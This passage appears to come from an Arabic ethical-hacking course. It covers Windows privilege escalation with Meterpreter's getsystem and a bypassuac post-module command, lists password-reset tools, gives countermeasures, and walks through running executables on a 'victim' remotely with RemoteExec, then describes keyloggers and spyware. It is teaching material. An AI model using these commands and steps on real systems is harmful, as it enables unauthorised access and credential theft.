أﯾﺿﺎ ﯾود طرﯾﻘﺔ أﺧرى ﻟرﻓﻊ اﻟﺻﻼﺣﯾﺎت ﻋن طرﯾﻖ اﻧﺗﺣﺎل اﻟﻣﺳﺗﺧدم systemوھو أﯾﺿﺎ ﻣن ﺧﻼل ﻗذﯾﻔﺔ Meterpreterﻋن طرﯾﻖ
طﺑﺎﻋﺔ اﻻﻣر getsystemوﯾﻣﻛﻧك أﯾﺿﺎ ﻣﻌرﻓﺔ ﺟﻣﯾﻊ ﺧﯾﺎراﺗﮫ ﺑﺎﺳﺗﺧدام اﻟﺧﯾﺎر –hﻣﻌﮫ.
ﻣﻠﺣوظﮫ :إذا ﻛﻧت ﺗﺣﺎول اﻟوﺻول إﻟﻰ ﺟﮭﺎز وﯾﻧدوز 7او اﻹﺻدارات اﻷﻋﻠﻰ ،ﯾﺟب ﺗﺷﻐﯾل اﻷﻣر bypassuacﻗﺑل أن ﺗﺗﻣﻛن ﻣن ﺗﺷﻐﯾل
اﻷﻣر .getsystemﺣﯾث ﯾﺳﻣﺢ ﻟك ﺑﺗﺟﺎوز ﺗﺣﻛم ﻣﺎﯾﻛروﺳوﻓت ﻓﻲ ﺣﺳﺎب اﻟﻣﺳﺗﺧدم )(UACﻟﻣزﯾد ﻣن اﻟﻣﻌﻠوﻣﺎت ﻋﻧﮫ ﯾﻣﻛﻧك زﯾﺎرة اﻟراﺑط
اﻟﺗﺎﻟﻲhttp://windows.microsoft.com/en-us/windows7/products/features/user-account-control :
وﯾﺗم ﺗﺷﻐﯾل ھذا ﺑﺎﺳﺗﺧدام اﻷواﻣر ﻛﻣﺎ ﯾﻠﻲ ﻓﻲ :Meterpreter
run post/windows/escalate/bypassuac
وﻛﻠﻣﺎت ﻣرورWindows administrator أو اﻻﻟﺗﻔﺎف ﺣول، إﻋﺎدة ﺗﻌﯾﯾن،أدوات ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات ﺗﺳﻣﺢ ﻟك ﺑﺄﻣﺎن وﻛﻔﺎءة إزاﻟﺔ
ﻣﻊ ﻣﺳﺎﻋدة. وﻻ ﯾﻣﻛﻧك ﺗﺳﺟﯾل اﻟدﺧول إﻟﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك،ﺣﺳﺎب اﻟﻣﺳﺗﺧدم ﻓﻲ ﺣﺎﻟﺔ ﻓﻘداﻧﮭﺎ أو ﻧﺳﯾﺎﻧﮫ ﻛﻠﻣﺔ اﻟﺳر اﻟﺧﺎﺻﺔ ﺑك
ﯾﻣﻛﻧك اﻟﺣﺻول ﺑﺳﮭوﻟﺔ اﻟوﺻول إﻟﻰ اﻟﻛﻣﺑﯾوﺗر ﻋن طرﯾﻖ إﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﻧﺳﯾﺔ أو اﻟﻐﯾر ﻣﻌروﻓﺔ إﻟﻰ ﻛﻠﻣﺎت،ﻣن ھذه اﻷدوات
وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض اﻷدوات ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات ﻋﻠﻰ اﻟﻧﺣو. ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم اﺳﺗﺧدام ھذه اﻷدوات ﻻﺳﺗﻌﺎدة ﻛﻠﻣﺎت اﻟﺳر اﻷﺻﻠﯾﺔ ﻟﻠﺿﺣﯾﺔ.ﻓﺎرﻏﺔ
:اﻟﺗﺎﻟﻲ
Offline NT Password & Registry Editor available at http://pogostick.net
Windows Password Reset Kit available at http://www.reset-windows-password.net
Windows Password Recovery Tool available at http://www.windowspasswordsrecovery.com
Elcomsoft System Recovery available at http://www.elcomsoft.com
Trinity Rescue Kit available at http://trinityhome.org
Windows Password Recovery Bootdisk available at http://www.rixler.com
PasswordLastic available at http://www.passwordlastic.com
Stellar Phoenix Password Recovery available at http://www.stellarinfo.com
Windows Password Recovery Personal available at http://www.windows-passwordrecovery.com
Windows Administrator Password Reset available at http://www.systoolsgroup.com
(How to Defend Against Privilege Escalation) ﻛﯾف ﺗداﻓﻊ ﺿد ھﺟوم ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات
أﻓﺿل اﻟطرق اﻟﻣﺿﺎدة ﺿد ھﺟوم ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات ھو اﻟﺗﺄﻛد ﻣن أن اﻟﻣﺳﺗﺧدﻣﯾن ﻟدﯾﮭم اﻣﺗﯾﺎزات أﻗل درﺟﺔ ﻣﻣﻛﻧﺔ أو ﻣﺟرد اﻣﺗﯾﺎزات ﻛﺎﻓﯾﺔ
أﻧﮫ ﻣن اﻟﻣﻣﻛن ﻟﻠﻣﮭﺎﺟﻣﯾن. ﺑﻌض اﻟﻌﯾوب ﻓﻲ اﻛواد اﻟﺑرﻣﺟﺔ ﯾﺳﻣﺢ ﺑﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات، ﻓﻲ ﻛﺛﯾر ﻣن اﻷﺣﯾﺎن.ﻻﺳﺗﺧدام اﻟﻧظﺎم ﺑﺷﻛل ﻓﻌﺎل
. ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم اﻟﺣﺻول ﻋﻠﻰ اﻣﺗﯾﺎز أﻋﻠﻰ ﻣن ﻣﺳؤول.اﻟوﺻول إﻟﻰ اﻟﺷﺑﻛﺔ ﺑﺎﺳﺗﺧدام ﺣﺳﺎب ﻏﯾر إدارﯾﺔ
:ﺗﺷﻣل اﻟﺗداﺑﯾر اﻟﻣﺿﺎدة ﺿد ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎز اﻟﻌﺎم اﻻﺗﻲ
.(Restrict the interactive logon privileges) ﺗﻘﯾﯾد اﻣﺗﯾﺎزات ﺗﺳﺟﯾل اﻟدﺧول-
.(Run users and applications on the least privileges) ﺟﻌل اﻟﻣﺳﺗﺧدﻣﯾن وﺗﺷﻐﯾل اﻟﺗطﺑﯾﻘﺎت ﻋﻠﻰ اﻷﻗل اﻻﻣﺗﯾﺎزات-
. (Implement multi-factor authentication and authorization) ﺗﻧﻔﯾذ ﻣﺻﺎدﻗﺔ ﻣﺗﻌددة اﻟﻌواﻣل-
.(Run services as unprivileged accounts) ﺗﺷﻐﯾل اﻟﺧدﻣﺎت ﻛﺣﺳﺎﺑﺎت ﻣن ﻏﯾر اﻣﺗﯾﺎزات ﻣﺛل ﻧظﺎم اﻟﺗﺷﻐﯾل ﻟﯾﻧﻛس-
(Use encryption technique to protect sensitive data) اﺳﺗﺧدام ﺗﻘﻧﯾﺔ اﻟﺗﺷﻔﯾر ﻟﺣﻣﺎﯾﺔ اﻟﺑﯾﺎﻧﺎت اﻟﺣﺳﺎﺳﺔ-
ﺗﻧﻔﯾذ ﻣﻧﮭﺟﯾﺔ ﻓﺻل اﻣﺗﯾﺎز ﻟﻠﺣد ﻣن ﻧطﺎق أﺧطﺎء اﻟﺑرﻣﺟﺔ-
Implement a privilege separation methodology to limit the scope of programming errors and bugs
(Reduce the amount of code that runs with particular privilege) ﺗﻘﻠﯾل ﻛﻣﯾﺔ اﻷﻛواد اﻟﺗﻲ ﯾﺗم ﺗﻧﻔﯾذھﺎ ﻣﻊ اﻣﺗﯾﺎز ﺧﺎص-
(Perform debugging using bounds checkers and stress tests) إﺟراء ﺗﺻﺣﯾﺢ-
اﺧﺗﺑﺎر ﻧظﺎم اﻟﺗﺷﻐﯾل واﺧطﺎء اﻛواد اﻟﺗطﺑﯾﻘﺎت واﻟﺧﻠل ﺑدﻗﺔ-
Test operating system and application coding errors and bugs thoroughly
(Patch the systems regularly) ﺗﺻﺣﯾﺢ اﻟﻧظم ﺑﺎﻧﺗظﺎم-
ﻣن ﺧﻼل ﺗﻧﻔﯾذ اﻟﺗطﺑﯾﻘﺎت اﻟﺧﺑﯾﺛﺔ ﻋﻠﻰ ﻧظﺎم اﻟﺿﺣﯾﺔ ،ﺣﯾث ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟﻣﯾن اﺳﺗﻐﻼل ﻧﻘﺎط اﻟﺿﻌف ﻟﺗﻧﻔﯾذ ﺑﻌض اﻷﻛواد ﻣﻊ اﻣﺗﯾﺎزات أﻋﻠﻰ
ﻣﻣﺎ ھو ﻣﺳﻣوح ﻟﮭم .ﻋن طرﯾﻖ ﺗﻧﻔﯾذ اﻟﺗطﺑﯾﻘﺎت اﻟﺧﺑﯾﺛﺔ ،ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم ﺳرﻗﺔ اﻟﻣﻌﻠوﻣﺎت اﻟﺷﺧﺻﯾﺔ ،واﻟوﺻول اﻟﻐﯾر ﻣﺻرح ﺑﮫ إﻟﻰ ﻣوارد
اﻟﻧظﺎم ،وﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ،واﻟﺗﻘﺎط اﻟﺻور ،وﺗﺛﺑﯾت backdoorﻟﻠﺣﻔﺎظ ﻋﻠﻰ ﺳﮭوﻟﺔ اﻟوﺻول ،اﻟﺦ .ﻓﯾﻣﺎ ﯾﻠﻲ ﺷرح ﻣﻔﺻل ﺣول ﺗﻧﻔﯾذ
اﻟﺗطﺑﯾﻘﺎت ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ.
Executing Applications
ﯾﻘوم اﻟﻣﮭﺎﺟﻣﯾن ﺑﺗﻧﻔﯾذ ﺑﻌض ﻣن اﻟﺗطﺑﯾﻘﺎت اﻟﺧﺑﯾﺛﺔ ﻓﻲ ھذه اﻟﻣرﺣﻠﺔ .وھذا ﻣﺎ ﯾﺳﻣﻰ "اﻣﺗﻼك" اﻟﻧظﺎم Executing Applications .ﯾﺗم ﺑﻌد
اﻛﺗﺳﺎب اﻟﻣﮭﺎﺟم ﺻﻼﺣﯾﺎت إدارﯾﺔ) . (administrative privilegesاﻟﻣﮭﺎﺟم ﻗد ﯾﺣﺎول ﺗﻧﻔﯾذ ﺑﻌض ﻣن اﻟﺑراﻣﺞ اﻟﺧﺑﯾﺛﺔ اﻟﺧﺎﺻﺔ ﺑﮫ ﻋن
ﺑﻌد ﻋﻠﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ ﻟﺟﻣﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﺗؤدي إﻟﻰ Exploitأو ﻓﻘدان اﻟﺧﺻوﺻﯾﺔ ،اﻟوﺻول اﻟﻐﯾر ﻣﺻرح ﺑﮫ إﻟﻰ ﻣوارد اﻟﻧظﺎم،
وﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ،واﻟﺗﻘﺎط ،screenshotﺗﺛﺑﯾت backdoorﻟﻠﺣﻔﺎظ ﻋﻠﻰ ﺳﮭﻠﺔ اﻟوﺻول ،وﻣﺎ ﯾﻠﻲ ﺑﻌض ﻣن ھذه اﻟﺑراﻣﺞ اﻟﺧﺑﯾﺛﺔ اﻟﺗﻲ
ﯾﻧﻔذ اﻟﻣﮭﺎﺟم ﻋﻠﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ:
Backdoors -
ھو ﻋﺑﺎره ﻋن ﺗطﺑﯾﻘﺎت ﻣﺻﻣﻣﺔ ل denyأو ﺗﻌطﯾل اﻟﻌﻣﻠﯾﺔ) ، (disrupt operationﺟﻣﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﺗؤدي إﻟﻰ Exploitأو ﻓﻘدان
اﻟﺧﺻوﺻﯾﺔ ،اﻟوﺻول اﻟﻐﯾر ﻣﺻرح ﺑﮫ إﻟﻰ ﻣوارد اﻟﻧظﺎم )ﺳﯾﺗم ﺗﻐطﯾﺗﮫ ﻻﺣﻘﺎ(.
Crackers -
ھو ﻋﺑﺎره ﻋن ﺟزء ﻣن ﺗطﺑﯾﻖ او ﺗطﺑﯾﻖ ﻣﺻﻣم ﻟﻛﺳر/ﻛراك اﻷﻛواد وﻛﻠﻣﺎت اﻟﻣرور.
Keyloggers -
ﯾﻣﻛن ھذا أن ﯾﻛون ﺟﮭﺎز ) (hardwareأو ﺗطﺑﯾﻖ ) .(softwareﻓﻲ ﻛﻠﺗﺎ اﻟﺣﺎﻟﺗﯾن ﻛﺎن اﻟﮭدف ھو ﺗﺳﺟﯾل ﻛل ﺿﻐطﺔ ﻟوﺣﺔ ﻣﻔﺎﺗﯾﺢ
اﻟﻛﻣﺑﯾوﺗر.
Spyware -
ﺑراﻣﺞ اﻟﺗﺟﺳس ) (Spy softwareﯾﻣﻛﻧﮭﺎ اﻟﺗﻘﺎط ﺟزء ﻣن اﻟﺷﺎﺷﺔ ) (Capture screenshotوإرﺳﺎﻟﮭﺎ إﻟﻰ ﻣوﻗﻊ ﻣﻌﯾن ﯾﺣدده اﻟﮭﺎﻛرز.
اﻟﻣﮭﺎﺟم ﻟدﯾﮫ ھدف وھو اﻟﺣﻔﺎظ ﻋﻠﻰ اﻟوﺻول إﻟﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ ﺣﺗﻰ ﯾﺗم اﻟﻐرض ﻣن ھذا .ﺑﻌد اﺳﺗﺧﻼص ﻛل اﻟﻣﻌﻠوﻣﺎت اﻟﻣطﻠوﺑﺔ
ﻣن ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ ،ﻓﺎن اﻟﻣﮭﺎﺟم ﯾﻘوم ﺑﺗﺛﺑﯾت اﻟﻌدﯾد ﻣن Backdoorsﻟﻠﺣﻔﺎظ ﻋﻠﻰ ﺳﮭوﻟﺔ اﻟوﺻول إﻟﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ
ﻓﻲ اﻟﻣﺳﺗﻘﺑل.
اﻟﻣﺻدرhttp://www.isdecisions.com :
RemoteExecﯾﺳﻣﺢ ﻟك ﺑﺗﺛﺑﯾت اﻟﺗطﺑﯾﻘﺎت ﻋن ﺑﻌد وﺗﻧﻔﯾذ اﻟﺑراﻣﺞ/اﻻﺳﻛرﺑﺎت ﻓﻲ ﺟﻣﯾﻊ أﻧﺣﺎء اﻟﺷﺑﻛﺔ .ﺣﯾث ﯾﻣﻛﻧﮫ ﺗﺣدﯾث أي ﻣن اﻟﻣﻠﻔﺎت
واﻟﻣﺟﻠدات ،وأﯾﺿﺎ ﻧﺳﺧﮭﺎ ،وﻛذﻟك ﺣذﻓﮭﺎ ﻋﻠﻰ اﻟﻔور ﻋﻠﻰ أﻧظﻣﺔ اﻟوﯾﻧدوز .ﻣﻊ ﻣﺳﺎﻋدة ﻣن ھذا ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم ﺗﻐﯾﯾر ﻛﻠﻣﺔ ﻣرور اﻟﺧﺎﺻﺔ
ﺑﺎﻟﻣﺳﺗﺧدم اﻟﻣﺳؤول اﻟﻣﺣﻠﻲ ﻋن ﺑﻌد ،وﯾﻣﻛن ﺗﻌطﯾل ﻛﺎﻓﺔ اﻟﺣﺳﺎﺑﺎت اﻟﻣﺣﻠﯾﺔ اﻷﺧرى ﻟﺗﻌزﯾز اﻷﻣن .ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ذﻟك ،ﻓﺈﻧﮫ ﯾﻣﻛن أﯾﺿﺎ إﻋﺎدة
ﺗﺷﻐﯾل ،إﯾﻘﺎف ،wake up ،و Power offﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﻋن ﺑﻌد.
-3ﻹﻋداد اﻟﻣﻠﻔﺎت اﻟﺗﻲ ﺳوف ﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ ﻋﻠﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ ) (Executing fileﯾﺗم ذﻟك ﻣن ﺧﻼل اﻟﻧﻘر اﻟﻣزدوج ﻓوق Remote
jobsواﻟﺗﻲ ﺗؤدى اﻟﻰ ظﮭور اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ:
-4ﻧﻘوم ﺑﺎﻟﻧﺛر اﻟﻣزدوج ﻓوق New remote jobواﻟذي ﯾؤدى اﻟﻰ اﻋداد وﺗﺷﻐﯾل new remote jobﻛﺎﻻﺗﻰ:
-5ﻓﻲ ﺟزء اﻻﻋداد New Remote jobﯾﻣﻛن رؤﯾﺔ اﻟﻌدﯾد ﻣن اﻟﻣﺟﻣوﻋﺎت واﻟﺗﻲ ﺗﻌﻣل ﻋن ﺑﻌد.
-6ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل ﺳوف ﻧﺧﺗﺎر ﻣن ﺧﻼل ھذه اﻟﻘﺎﺋﻣﺔ File executionواﻟذي ﯾﻘوم ﺑﺗﺷﻐﯾل أي ﻣن اﻟﺗطﺑﯾﻘﺎت ﻋﻠﻰ اﻟﺟﺎھز اﻟﮭدف
ﻋن ﺑﻌد وذﻟك ﻣن ﺧﻼل اﻟﻧﻘر اﻟﻣزدوج ﻋﻠﻰ File executionاﻟﻣوﺟودة ﻓﻲ اﻟﻘﺎﺋﻣﺔ واﻟﺗﻲ ﺗؤدى اﻟﻰ ظﮭور اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ:
-7ﻣن اﻟﻘﺎﺋﻣﺔ اﻟﺧﺎﺻﺔ ب File executionﻋﻧد اﻟﺗﻌﺑﯾر Fileﻧﺧﺗﺎر ﻣﻠف exeاﻟذي ﻧرﯾد ﺗﺷﻐﯾﻠﮫ ﻋﻠﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ .ﻣن اﻟﻘﺎﺋﻣﺔ
اﻟﻣﻧﺳدﻟﺔ ﻣن اﻟﺗﻌﺑﯾر Contextﻧﺧﺗﺎر Interactiveوأﯾﺿﺎ ﻧﺧﺗﺎر اﻟﺗﻌﺑﯾر .auto
-8ﻓﻲ اﻟﺟزء اﻟﺧﺎص ب filterﻧﺧﺗﺎر ﻋﻠﻰ ﺣﺳب اﻟﻧظﺎم اﻟﮭدف ﻣﺛﻼ ﻛﺎﻻﺗﻰ:
-9ﻓﻲ اﻟﺟزء اﻟﺧﺎص ب Target computersﻧﺧﺗﺎر اﻟﮭدف اﻟذي ﺳوف ﻧﻘوم ﺑﺗﺷﻐﯾل اﻟﺗطﺑﯾﻖ ﻋﻠﯾﮫ وذﻟك ﻣن ﺧﻼل اﻟﻧﻘر ﻓوق
Nameوإدﺧﺎل اﻟﮭدف.
-10اﻻن ﺑﻌد اﻻﻧﺗﮭﺎء ﻣن ﺟﻣﯾﻊ اﻻﻋدادات ﻧﻘوم ﺑﺗﺷﻐﯾل اﻟﺗطﺑﯾﻖ ﻣن ﺧﻼل اﻟﻧﻘر ﻓوق Lunchاﻟﻣوﺟودة ﻓﻲ اﻟﻘﺎﺋﻣﺔ ﻋﻠﻰ اﻟﺟﺎﻧب اﻷﯾﻣن.
اﻟﻣﺻدرhttp://www.dameware.com :
اﻟﺑرﻧﺎﻣﺞ DameWare NTﯾﺳﻣﺢ ﻟك ﻹدارة اﻟﺧوادم وأﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺣﻣوﻟﺔ ،وأﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺣﻣوﻟﺔ ﻋن ﺑﻌد .ﻣﻊ ﻣﺳﺎﻋدة ﻣن
ھذا ،ﯾﻣﻛﻧك إدارة أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر ﻋن ﺑﻌد وإدارة اﻟوﯾﻧدوز .أﯾﺿﺎ ﻟدﯾﮫ اﻟﻘدرة ﻋﻠﻰ ﺣل ﻣﺷﺎﻛل اﻟﻣﺳﺗﺧدم اﻟﻧﮭﺎﺋﻲ ﺑﺎﺳﺗﺧدام ﺟﮭﺎز اﻟﺗﺣﻛم ﻋن
ﺑﻌد .ﻓﺈﻧﮫ ﯾﻣﻛن إﻋﺎدة ﺗﺷﻐﯾل اﻟﺧوادم وأﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺣﻣوﻟﺔ ﻋن ﺑﻌد ،وأﺧذ ﻟﻘطﺎت ) (capture screenshotﻣن ﺳطﺢ اﻟﻣﻛﺗب اﻟﺑﻌﯾد،
وﯾﻣﻛﻧﮫ اﻟﺳﯾطرة اﻟﻛﺎﻣﻠﺔ ﻋﻠﻰ ﺳطﺢ اﻟﻣﻛﺗب ﻟﻠﻣﺳﺗﺧدم اﻟﻧﮭﺎﺋﻲ ﺑﺳرﻋﺔ ،ﯾﻣﻛﻧﮫ ﻧﺳﺦ وﻛذﻟك ﺣذف اﻟﻣﻠﻔﺎت ﻋﻠﻰ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر ﻋن ﺑﻌد ،وإدارة
وﯾﻧدوز ،active directoryاﻟﺦ.
Keyloggers
،Keyloggersوﯾﺳﻣﻰ أﯾﺿﺎ ﺗﺳﺟﯾل ﺿﻐط اﻟﻣﻔﺎﺗﯾﺢ ) (keystroke loggingوﯾطﻠﻖ ﻋﻠﯾﮫ أﯾﺿﺎ راﺻد ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ .ھو ﻋﺑﺎره ﻋن
ﺑرﻧﺎﻣﺞ ﻣﺧﻔﻲ ﯾرﺳل ﻋﺑر اﻹﯾﻣﯾل أو اﻧت ﺗﻘوم ﺑﺗﺣﻣﯾﻠﮫ ﻣن أﺣد اﻟﻣواﻗﻊ ﻏﯾر اﻟﻣوﺛوﻗﺔ أو ﯾﻛون ﺿﻣن اﻟﺑراﻣﺞ اﻟﻣﺟﺎﻧﯾﺔ واﻧت ﻻ ﺗﻌﻠم ﺑذﻟك ،وﻗد
ﯾﻛون ﻋﺑﺎره ﻋن اﺟﮭزه أﯾﺿﺎ ﺣﯾث ﯾﻘوم ﺑﻧﻘل ﻛﺎﻓﺔ ﻣﺎ ﯾﻛﺗب ﺑﻠوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ إﻟﻰ ﺟﮭﺎت ﺑﻌﯾدة ﻋﺎدة إﻟﻰ ﺻﺎﺣب اﻟﺗﺟﺳس أو ﻣرﺳل اﻟﺑرﻧﺎﻣﺞ،
وھذا ھو أﺧطر ھذه اﻟﻛﺎﺋﻧﺎت واﻟذي ﯾﻌد ﻋﻣﻠﮫ أﺷﺑﮫ ﻣﺎ ﯾﻛون ﺑﻌﻣل ﺣﺻﺎن طروادة أﺣد أﻧواع ﻓﯾروﺳﺎت اﻟﺗﺟﺳس وﯾﺳﺗﺧدم ﻟﻣراﻗﺑﺔ أﺟﮭزة
ﻣﻌﯾﻧﺔ وﻣﻌرﻓﺔ ﻣﺎ ﯾﻛﺗب ﻋﻠﯾﮭﺎ .ﻣﺛل ارﻗﺎم اﻟﺳر وﻛﻠﻣﺎت اﻟدﺧول ارﻗﺎم ﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن .أﻛﺛرﯾﺔ ﻣﺳﺗﺧدﻣﻲ ﺧدﻣﺔ اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﯾوم
ﯾﻌرﻓون اﻟﺣد اﻷدﻧﻰ اﻟﻼزم ﻣن اﻟﻣﻌﻠوﻣﺎت ﺣول اﻟرﺳﺎﺋل اﻟﻛﺎذﺑﺔ اﻟﻣﺳﻣﺎة Phishingو اﻟﺗﻲ ﺗﺻل ﺑﺎﺳم ﺷرﻛﺔ أو ﺑﻧك أو ﺷﺧص ﻣﻌﯾن ﻓﻲ
ﺣﯾن أﻧﮭﺎ ﻟﯾﺳت ﻣن اﻟﻣﺻدر اﻟﻣﻌﻠن ﻋﻧﮭﺎ وھدﻓﮭﺎ اﻟوﺣﯾد ھو ﺳرﻗﺔ ﻣﻌﻠوﻣﺎت ﺧﺎﺻﺔ ﺗﺳﺗﻌﻣﻠﮭﺎ ﻣﺛل ﻛﻠﻣﺎت ﻣرور ﺑﻧك أو أي ﻛﻠﻣﺎت ﻣرور
أﺧرى .ھو ﻣﺛل اﻟﻣﺣول ،ﺣﯾث ﻻ ﯾدرك اﻟﺷﺧص ان أﻧﺷطﺗﮫ اﻟﺗﻲ ﯾﻘوم ﺑﮭﺎ ﯾﺗم رﺻدھﺎ .ﻏﺎﻟﺑﺎ ﻣﺎ ﯾﺳﺗﺧدم ﻷﻏراض إﯾﺟﺎﺑﯾﺔ ﻣﺛل ﻓﻲ اﻟﻣﻛﺎﺗب
واﻟﻣواﻗﻊ اﻟﺻﻧﺎﻋﯾﺔ ﻟرﺻد أﻧﺷطﺔ اﻟﻛﻣﺑﯾوﺗر اﻟﻣوظﻔﯾن وﻓﻲ ﺑﯾﺋﺎت اﻟﻣﻧزل ﺣﯾث ﯾﻣﻛن ﻟﻠواﻟدﯾن ﻣراﻗﺑﺔ ﻣﺎ ﺗﻘوم ﺑﮫ أطﻔﺎﻟﮭم ﻋﻠﻰ اﻹﻧﺗرﻧت.
، Keyloggersﻋﻧدﻣﺎ ﯾرﺗﺑط ﻣﻊ ﺑراﻣﺞ اﻟﺗﺟﺳس ،ﯾﺳﺎﻋد ﻋﻠﻰ ﻧﻘل اﻟﻣﻌﻠوﻣﺎت ﻟطرف ﺛﺎﻟث ﻏﯾر ﻣﻌروف .ﯾﺗم اﺳﺗﺧداﻣﮫ ﺑﺷﻛل ﻏﯾر ﻗﺎﻧوﻧﻲ
ﻣن ﻗﺑل اﻟﻣﮭﺎﺟﻣﯾن ﻷﻏراض ﺧﺑﯾﺛﺔ ﻣﺛل ﺳرﻗﺔ ﻣﻌﻠوﻣﺎت ﺣﺳﺎﺳﺔ وﺳرﯾﺔ ﻣن اﻟﺿﺣﺎﯾﺎ .ﯾﺗﺿﻣن ﻣﻌﻠوﻣﺎت ﺣﺳﺎﺳﺔ ﻣﻌرﻓﺎت اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ،
ﻛﻠﻣﺎت اﻟﺳر ،اﻟﺗﻔﺎﺻﯾل اﻟﻣﺻرﻓﯾﺔ وﻧﺷﺎط ﻏرﻓﺔ اﻟدردﺷﺔ ،IRC ،واﻟرﺳﺎﺋل اﻟﻔورﯾﺔ ،واﻟﺑﻧوك ،وﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن واﻷرﻗﺎم ،وﻏﯾرھﺎ ﻣن
اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻣن ﻗﺑل اﻟﻧﺎس ﻛل ﯾوم .اﻟﺑﯾﺎﻧﺎت ،أي اﻟﺗﻲ ﺗﻧﺗﻘل ﻋﺑر اﻻﺗﺻﺎل اﻹﻧﺗرﻧت ﻣﺷﻔرة ،ھﻲ أﯾﺿﺎ ﻋرﺿﺔ ﻟل
Keyloggersﻷن Keyloggersﯾﺗﺗﺑﻊ ﺿرب اﻟﻣﻔﺎﺗﯾﺢ ﻗﺑل أن ﯾﺗم ﺗﺷﻔﯾرھﺎ ﻟﻧﻘﻠﮭﺎ ﻋﺑر اﻟﺷﺑﻛﺔ.
ﯾﺗم ﺗﺛﺑﯾت اﻟﺑرﻧﺎﻣﺞ Keyloggersﻋﻠﻰ اﻟﻧظﺎم اﻟﻣﺳﺗﺧدم ﺑﺧﻔﺎء ﻣن ﺧﻼل ﻣرﻓﻘﺎت اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ أو ﻣن ﺧﻼل ﺗﺣﻣﯾل " " drive-by
ﻋﻧدﻣﺎ ﯾﻘوم اﻟﻣﺳﺗﺧدﻣون ﺑزﯾﺎرة ﺑﻌض اﻟﻣواﻗﻊ Keystroke logger’s .ھﻲ ﺑراﻣﺞ ﺷﺑﺢ واﻟﺗﻲ ﺗﺟﻠس ﺑﯾن ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ اﻷﺟﮭزة وﻧظﺎم
اﻟﺗﺷﻐﯾل ،ﺑﺣﯾث ﯾﻣﻛن ﺗﺳﺟﯾل ﻛل ﺿﻐطﺔ ﻣﻔﺗﺎح.
Keyloggerﯾﻣﻛﻧﮫ اﻻﺗﻲ:
ﺗﺳﺟﯾل ﻛل ﺿﻐطﺔ ﻣﻔﺗﺎح ،أي اﻟﺗﻲ ﻛﺗﺑت ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم ،ﻋﻠﻰ ﻟوﺣﺔ ﻣﻔﺎﺗﯾﺢ اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎﺻﺔ ﺑﮫ. -1
اﻟﺗﻘﺎط ﻟﻘطﺎت )(screenshotﻋﻠﻰ ﻓﺗرات ﻣﻧﺗظﻣﺔ ﻣن اﻟزﻣن واﻟﺗﻲ ﺗﺑﯾن ﻧﺷﺎط اﻟﻣﺳﺗﺧدم ﻣﺛل طﺑﺎﻋﺔ ﺑﻌض اﻻﺣرف أو ﺑﺎﻟﻧﻘر ﻓوق -2
زر اﻟﻣﺎوس.
ﺗﺗﺑﻊ أﻧﺷطﺔ اﻟﻣﺳﺗﺧدﻣﯾن ﻋن طرﯾﻖ ﺗﺳﺟﯾل ﻋﻧﺎوﯾن اﻟﻧﺎﻓذة ،أﺳﻣﺎء اﻟﺗطﺑﯾﻘﺎت اﻟﺗﻲ ﺗم ﺗﺷﻐﯾﻠﮭﺎ ،وﻏﯾرھﺎ ﻣن اﻟﻣﻌﻠوﻣﺎت. -3
